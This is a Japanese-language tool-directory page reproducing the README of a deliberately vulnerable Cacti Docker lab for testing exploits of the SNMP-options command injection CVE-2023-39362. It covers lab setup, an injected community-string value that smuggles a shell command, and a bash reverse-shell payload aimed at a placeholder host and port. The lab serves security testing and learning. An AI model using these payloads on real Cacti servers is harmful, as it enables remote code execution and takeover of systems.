Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cacti-rce-snmp-options-vulnerable-application — 警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください! | Kitploit
ツール/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール学習と教育ラボと実践
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください!

リポジトリを見るウェブサイト
61年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Cacti v1.2.24 認証済みコマンドインジェクション (CVE-2023-39362) 脆弱性アプリケーション

これは Cacti の脆弱性 (CVE-2023-39362) に対するエクスプロイトをテストするための脆弱性アプリケーションです。

警告!

このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップがあり隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)の使用を推奨します。このアプリケーションをインターネットに接続されたサーバーにアップロードしないでください。侵害されます。

免責事項: 私は、誰もがこのアプリケーションを使用する方法について責任を負いません。このアプリケーションの唯一の目的は、CVE-2023-39362 エクスプロイトのテストシナリオとなることであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。

脆弱性情報

  • CVE-ID: CVE-2023-39362
  • リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • 説明: Cacti 1.2.24 において、特定の条件下で、認証された特権ユーザーがデバイスの SNMP オプションに悪意のある文字列を使用し、コマンドインジェクションを実行して、基盤となるサーバー上でリモートコード実行を達成する可能性があります。

使用方法

環境をセットアップする手順は次のとおりです:

  1. docker compose up -d を実行して構成を開始します。
  2. http://127.0.0.1/cacti にアクセスして Cacti 初期化ウィザードを開始すると、手順を完了できます。データベースに関するエラーが発生した場合は、少し待ってからページを更新してください。
  3. デフォルトの認証情報は admin/admin です。
  4. ウィザード中はすべてのボタンで「Next」を押し、適宜オプションを選択します。デフォルトのままで問題なく、必須の前提条件はすべて満たされているはずです。
  5. インストール後、admin としてログインします。
  6. 「Console」→「Configuration」→「User」の順に移動します。
  7. guest ユーザーをクリックします。
  8. 「Enable」で有効にし、パスワードを設定します。必要に応じて「Must Change Password at Next Login」を無効にします。
  9. 「Save」ボタンをクリックします。
  10. 「Permissions」セクションに移動します。
  11. 「General Administration」の下で、「Console Access」と「Sites/Devices/Data」を有効にします。
  12. 「Save」ボタンをクリックします。
  13. ログアウトして guest として再ログインし、エクスプロイトを試します。

コンテナ名は vuln-cacti になります。

テスト用 SNMP デバイスのホスト名は monitored_snmp_device です。

環境を破棄するには、docker compose down コマンドを使用します。

Cacti の公式インストールガイドは こちら にあります。

根本原因

この脆弱性の詳細な根本原因は、オリジナルのセキュリティアドバイザリ または 私のブログ記事 で確認できます。

エクスプロイト

(これは 考えられる一つの エクスプロイトです)

  1. 「Console」→「Create」→「New Device」に移動します。
  2. SNMP バージョン 1 または 2 をサポートするデバイスを作成します。
  3. デバイスに次のテンプレートのいずれかを含むグラフがあることを確認します:
    • 「Net-SNMP - Combined SCSI Disk Bytes」
    • 「Net-SNMP - Combined SCSI Disk I/O」
    • (テンプレート「Net-SNMP Device」からデバイスを作成すると、グラフの前提条件を満たします)
  4. 「SNMP Options」の「SNMP Community String」フィールドに次のような値を使用します: public\' ; touch /tmp/m3ssap0 ; \' 。
  5. 「Create」ボタンをクリックします。
  6. /tmp 以下に作成されたファイルが存在することを確認します。

リバースシェルを取得するには、次のようなペイロードを使用できます。

public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

著作者

  • Antonio Francesco Sardella - 脆弱性報告者 - m3ssap0

ライセンス

このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。

ツールをダウンロード